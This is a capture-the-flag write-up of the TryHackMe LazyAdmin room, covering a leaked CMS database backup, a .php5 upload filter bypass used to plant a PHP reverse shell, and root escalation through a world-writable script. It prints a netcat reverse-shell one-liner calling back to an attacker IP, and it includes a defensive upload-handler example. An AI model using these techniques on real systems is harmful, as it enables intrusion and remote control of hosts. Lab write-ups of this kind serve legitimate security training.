TryHackMe - LazyAdmin (Easy)
Author: ret2basic

Summary

Gobuster finds a hidden directory /content that leaks the CMS name. Searchsploit finds an exploit that leads us to a MySQL backup file, which leaks the admin user's password hash. The hash is plain MD5 and we recover the plaintext password easily. Running Gobuster on /content, we find another hidden directory /content/as that has a login form. Using the leaked credential, we can access the admin panel.
In the admin panel, we find a file upload vulnerability and an easy file extension bypass. Upload php-reverse-shell.php5 and get a reverse shell as www-data.
In the privilege escalation phase, sudo -l finds that we are able to execute Perl as root. There is a backup script that executes /etc/copy.sh as root and /etc/copy.sh is world-writable. Store a Netcat reverse shell payload in it and run sudo perl on the backup script. Then we catch a reverse shell as root.

IP

    RHOST: 10.10.10.20
    LHOST: 10.13.12.2

Nmap

(screenshot: Nmap scan output)

Directory Fuzzing

Gobuster finds a hidden directory /content:
(screenshot: Gobuster output)
Visit http://lazyadmin.thm/content/. The CMS used is SweetRice:
(screenshot: SweetRice page)

Admin Panel: Leaked Credential from MySQL Backup

Searchsploit:
(screenshot: searchsploit results for SweetRice)
The "Backup Disclosure" PoC says the MySQL backup is at /inc/mysql_backup. In our case it is at /content/inc/mysql_backup. Browse to this directory:
(screenshot: /content/inc/mysql_backup listing)
The manager user's password hash is leaked in this backup:
(screenshot: password hash)
An MD5 reverse hash lookup shows that the plaintext password is Password123, so the credential is manager:Password123. Now we need to find a login page where we can use it.
Running Gobuster on the directory /content finds a new directory /content/as:
(screenshot: Gobuster on /content)
This directory has a login form:
(screenshot: /content/as login form)
Try the credential we just found and we have access to the admin panel:
(screenshot: admin panel)

www-data Shell: File Upload

There is an arbitrary file upload exploit for SweetRice:
(screenshot: arbitrary file upload exploit)
It suggests that the .php5 extension bypasses the upload filter:
(screenshot: .php5)
Rename php-reverse-shell.php to php-reverse-shell.php5, go to "Media Center", and upload it:
(screenshot: file upload)
Start a pwncat listener and catch a reverse shell as www-data:
(screenshot: www-data shell)
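To show why the .php5 rename works and what a fixed upload handler looks like, here is an added example (not SweetRice's code and not from the original writeup): a blocklist filter of the kind the bypass defeats, beside an allowlist handler that also renames the stored file. The blocklist contents and the allowed media extensions are assumptions.

```python
import os
import re
import secrets
from typing import Optional

# Constructed blocklist: it rejects the PHP extensions it knows about, but
# .php5 (which Apache's mod_php also executes) is missing, so the writeup's
# renamed shell passes straight through.
WEAK_BLOCKLIST = {".php", ".phtml", ".php3", ".php4"}

# Constructed allowlist for a "Media Center" style upload: only document and
# image extensions are accepted; everything else is rejected by default.
MEDIA_ALLOWLIST = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}

# Script-like extensions anywhere in the name (shell.php.png) are rejected too,
# because a server with AddHandler/multiviews may execute such files even though
# the last extension is harmless.
SCRIPT_EXT_RE = re.compile(r"\.(php\d*|phtml|phar|phps)(?=\.|$)", re.IGNORECASE)


def weak_is_allowed(filename: str) -> bool:
    """Blocklist check: only rejects extensions it has heard of."""
    _, ext = os.path.splitext(filename)
    return ext.lower() not in WEAK_BLOCKLIST


def hardened_store_name(filename: str) -> Optional[str]:
    """Allowlist check plus server-side renaming.

    Returns the name the upload should be stored under, or None to reject it.
    Pair this with content validation (e.g. decoding the image) and a
    non-executable upload directory; the extension check alone is not enough.
    """
    base = os.path.basename(filename)      # strip any path components
    _, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in MEDIA_ALLOWLIST:
        return None
    # Look for a script extension hidden before the final (allowed) one.
    if SCRIPT_EXT_RE.search(base[: -len(ext)]):
        return None
    # Never reuse the client-supplied name: store under a random token.
    return f"{secrets.token_hex(16)}{ext}"
```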

Privilege Escalation: Sudo Perl => World-Writable File => Reverse Shell

sudo -l:
(screenshot: sudo -l output)
The file /home/itguy/backup.pl executes sh /etc/copy.sh as root, and /etc/copy.sh is world-writable:
(screenshot: /etc/copy.sh)
Store a Netcat reverse shell payload in /etc/copy.sh:

    echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.12.2 1337 >/tmp/f' > /etc/copy.sh

Start a pwncat listener and execute backup.pl as root:

    sudo /usr/bin/perl /home/itguy/backup.pl

Now we have a root shell:
(screenshot: root shell)